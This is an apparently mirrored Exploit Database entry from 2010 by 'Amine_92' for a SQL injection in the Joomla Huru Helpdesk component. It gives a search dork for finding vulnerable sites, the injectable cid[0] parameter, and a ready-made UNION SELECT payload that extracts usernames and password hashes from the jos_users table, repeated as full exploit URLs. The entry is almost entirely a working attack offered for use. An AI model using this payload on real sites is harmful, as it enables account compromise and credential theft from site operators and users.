Joomla! Component Huru Helpdesk – SQL Injection (2)

• Exploit Database
• 103 阅读

• 作者： Amine_92
  日期： 2010-07-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14449/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

  ==================================================== Joomla Component com_huruhelpdesk SQL Injection Vulnerability ===================================================   Author : Amine_92 Email: [amine92_16@hotmail.fr] Homepage : { www.vbhacker.net/vb } DORK:inurl:"index.php?option=com_huruhelpdesk" ===================================================   [+] Vulnerable File : http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]   [+] ExploiT : -1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--   [+] Example : http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users-- [+] Demo : http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--   ==================================================== Thank's to :awras,italiano_capilo & all my friends